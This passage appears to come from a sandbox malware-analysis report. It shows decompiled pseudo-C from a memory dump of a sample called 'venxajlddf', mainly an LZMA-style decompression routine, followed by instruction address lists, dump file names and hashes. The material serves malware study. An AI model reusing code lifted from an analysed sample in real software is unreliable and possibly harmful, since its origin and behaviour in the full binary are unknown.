															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
